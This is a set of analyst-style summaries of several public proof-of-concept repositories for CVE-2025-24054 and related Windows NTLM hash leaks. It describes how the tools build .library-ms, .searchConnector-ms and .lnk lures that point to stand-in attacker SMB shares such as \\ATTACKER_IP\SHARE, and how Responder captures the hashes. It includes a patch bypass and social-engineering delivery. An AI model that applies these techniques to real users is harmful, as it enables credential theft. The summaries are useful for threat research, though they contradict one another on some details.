Windows NTLM Hash Disclosure Spoofing via .library-ms

This repository is a small, single-purpose proof-of-concept for CVE-2025-24054, a Windows .library-ms NTLM hash disclosure issue. It contains two files: a README describing the attack flow and usage, and a Python script (poc.py) that serves as the sole executable entry point. The script accepts an attacker IP address plus optional library/share names, builds a malicious .library-ms XML file containing a UNC path of the form \\ATTACKER_IP\SHARE, and packages that file into a ZIP archive for delivery. The exploit capability is limited but clear: it does not execute code on the victim, but it weaponizes Windows Explorer behavior so that when a victim extracts the ZIP, Explorer attempts to resolve the embedded remote library location over SMB. That outbound authentication leaks the victim's Net-NTLMv2 hash to the attacker-controlled SMB listener. The README explicitly suggests using Responder to capture the hash. Structurally, this is not part of a larger exploit framework and is not a detection script. It is a straightforward PoC generator with no built-in listener, cracking, relay, or post-exploitation logic. There are no hardcoded external IPs or domains; the primary fingerprintable target is the operator-supplied UNC path embedded into the generated XML. The repository's purpose is to help an operator create a malicious archive for lab validation of NTLM hash disclosure via crafted .library-ms files.

This repository is a small Metasploit auxiliary module project consisting of a license, a README, and one Ruby exploit module: ntlm_hash_leak.rb. Because it is a Metasploit module, the main analysis centers on that single Ruby file. The module uses Metasploit's FILEFORMAT mixin to generate a malicious ZIP archive rather than directly exploiting a remote service. Its purpose is to weaponize CVE-2025-24054, formerly referred to as CVE-2025-24071, by placing a crafted .library-ms file inside a ZIP. The embedded XML contains a search connector URL pointing to an attacker-controlled UNC path in the form \\ATTACKER_IP\SHARE_NAME. When a victim on Windows extracts or otherwise causes Explorer to process the .library-ms file, Windows attempts SMB authentication to that remote path, leaking the victim's NTLM hash. Core capabilities: the module registers configurable options for the output ZIP filename, attacker IP, .library-ms filename, and fake SMB share name; builds the malicious XML; inserts it into a ZIP archive; and writes the archive to Metasploit's local output directory. It does not itself capture hashes or deliver a shell. Instead, it prepares the lure file used to induce outbound SMB authentication. The README explains intended operational use with Metasploit's SMB capture module or external tools like Responder/Impacket. Repository structure is minimal and coherent: Readme.md documents the vulnerability, installation, and usage; ntlm_hash_leak.rb contains the exploit logic; LICENSE is standard MIT text. There is no detection-only behavior, no destructive logic, and no obvious signs of fakery. This is a real exploit module for file generation and credential leakage, best classified as a Metasploit weaponized auxiliary/file-format exploit with network impact via SMB authentication leakage.

Repository contains a minimal PoC for CVE-2025-24054 with two files: a tiny README and a single Python script (cve-2025-24054.py). The script is a generator that creates a crafted Windows “.library-ms” XML file and packages it into a ZIP (default: exploit.zip). The XML’s <url> element points to a user-specified UNC path (\\host\share) or, if given a bare host/IP, to \\<target>\shared. When the victim opens/imports the .library-ms on Windows 10/11, Windows may attempt to access the remote UNC location, potentially triggering an outbound NTLM authentication attempt and disclosing NTLM hashes/credentials to the remote SMB share. The code includes basic input validation (hostname/IP/UNC checks) and filename sanitization, supports interactive prompts, a --dry-run mode to print the XML without writing files, and a --force option to overwrite an existing ZIP. No additional payload execution is present beyond generating the coercive .library-ms artifact.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-24054 and CVE-2025-24071, targeting a vulnerability in Windows where opening a specially crafted .library-ms file can trigger an SMB authentication attempt to an attacker-controlled server, leaking the victim's NTLM hash. The repository contains three files: a Python script (exploit.py) that generates malicious .library-ms files pointing to arbitrary UNC paths, a sample .library-ms file (xd.library-ms) configured to point to \\10.10.14.22\share, and a README with detailed usage instructions. The exploit requires the victim to open or preview the malicious file on an unpatched Windows system. The attack vector is local (user interaction required), and the main fingerprintable endpoint is the UNC path embedded in the .library-ms file. The exploit is a PoC and does not include a payload for post-exploitation, but it enables credential theft via NTLM hash capture.

This repository provides a comprehensive proof-of-concept (PoC) toolkit for exploiting a chain of vulnerabilities in Windows Explorer's handling of certain file formats, resulting in zero-click NTLMv2-SSP hash disclosure. The repository contains two main exploit scripts: 1. 'ntml-disclosure-poc.py' (Python): Generates a malicious .searchConnector-ms (XML) file with an embedded UNC path pointing to an attacker-controlled SMB server, packages it in a ZIP archive, and is designed to exploit CVE-2025-24054. When a victim opens the ZIP in Windows Explorer, the embedded UNC path is automatically resolved, causing the system to attempt SMB authentication and leak the NTLM hash. 2. 'patch_bypass.ps1' (PowerShell): Generates a malicious .lnk (shortcut) file with its TargetPath set to a UNC path (again pointing to the attacker's SMB server), then packages it in a ZIP archive. This script targets the patched scenario (CVE-2025-50154 and CVE-2025-59214), bypassing Microsoft's initial fixes by leveraging Windows Explorer's icon and metadata fetching behavior. The LNK file can also be distributed standalone. Both scripts are operational exploits, not just detection tools. The README provides detailed technical background, usage instructions, and deployment scenarios, including social engineering vectors. The main attack vector is network-based, leveraging SMB authentication over UNC paths. The only fingerprintable endpoints are the attacker-controlled UNC paths (e.g., \\192.168.1.100\share or \\attacker-host\share\file), which must be accessible to the victim. The repository is well-structured, with clear separation between the Python and PowerShell implementations, and is intended for offensive security research and demonstration of the described vulnerabilities.

This repository contains a single Python script (PoC.py) that generates a malicious .library-ms file, which is then zipped into 'exploit.zip'. The script takes two arguments: a base filename and an IP address. It creates an XML-based .library-ms file referencing a remote SMB share at the provided IP address. When a victim opens this file on a Windows system, their machine attempts to connect to the attacker's SMB server, potentially leaking NTLM credentials. The exploit demonstrates a classic 'SMB relay' or 'NTLM credential theft' vector via a crafted Windows Library file. The repository is a proof-of-concept and does not include a server component to capture credentials. The only file present is PoC.py, written in Python, and the exploit targets Windows systems by leveraging their handling of .library-ms files.

This repository provides a proof-of-concept (POC) exploit for CVE-2025-24054, a vulnerability in Microsoft Windows that allows NTLMv2 hash leakage via malicious .library-ms files. The repository contains two main Python scripts: - ELAINA-POC.py: A full-featured POC tool that can generate a malicious .library-ms file pointing to an attacker-controlled SMB share (using the 'create' command) and extract NTLM hashes from Responder logs (using the 'extract' command). It includes argument parsing and integrity checks for the ASCII logo. - CVE-2025-24054.py: A minimal script to extract NTLM hashes from a log file, using a regular expression. - Exploit.library-ms: A sample malicious .library-ms file with a placeholder for the attacker's SMB share. - README.md: Instructions in both Vietnamese and English on how to use the scripts to generate the malicious file, send it to a victim, and extract hashes from captured logs. The exploit works by generating a .library-ms file that, when opened by a Windows user, causes the system to attempt authentication to an attacker-controlled SMB server, leaking NTLMv2 hashes. The attacker can then extract these hashes from their SMB server logs using the provided scripts. The repository is structured for ease of use, with clear separation between payload generation and hash extraction functionality.

This repository is a proof-of-concept (PoC) exploit for CVE-2025-24054 and CVE-2025-24071, targeting a vulnerability in Windows where opening a specially crafted .library-ms file causes the system to initiate an SMB authentication to an attacker-controlled server, leaking the user's NTLMv2 hash. The repository contains three files: a Python script (exploit.py) that generates a malicious .library-ms file pointing to a configurable SMB server, a sample .library-ms file (xd.library-ms) with a hardcoded attacker IP, and a README with detailed usage instructions. The exploit requires the attacker to run an SMB server (such as Responder) and the victim to open or preview the malicious file. The main attack vector is local file execution leading to a network-based NTLM hash leak. The repository is structured as a PoC and does not include weaponized or automated exploitation features.

This repository contains a proof-of-concept exploit for CVE-2025-24054, a Windows NTLM credential theft vulnerability. The main file, CVE-2025-24054.py, is a Python script that generates a malicious .library-ms file. When this file is opened on a vulnerable Windows system, it causes the system to connect to an attacker-controlled SMB share (specified by the attacker IP and share name), resulting in the victim's NTLM hashes being sent to the attacker's server. The repository consists of the exploit script and a brief README describing the vulnerability. The exploit does not include a payload for post-exploitation, but demonstrates the credential theft vector via crafted file generation.

This repository contains a single Python script, 'create_library_ms.py', which generates a malicious Windows Library file (.library-ms). The script prompts the user for an attacker-controlled server address and creates a .library-ms file embedding a UNC path (e.g., \\attacker_ip\evilshare). When a victim opens this file in Windows Explorer, the system attempts to access the specified UNC path, causing Windows to authenticate to the attacker's SMB server and leak Net-NTLMv1/v2 hashes. The script is a proof-of-concept for credential capture attacks leveraging Windows' handling of library files and SMB authentication. The repository is structured as a single, self-contained exploit generator, and is intended for educational/lab use only. No hardcoded endpoints are present; the attacker provides the target server at runtime.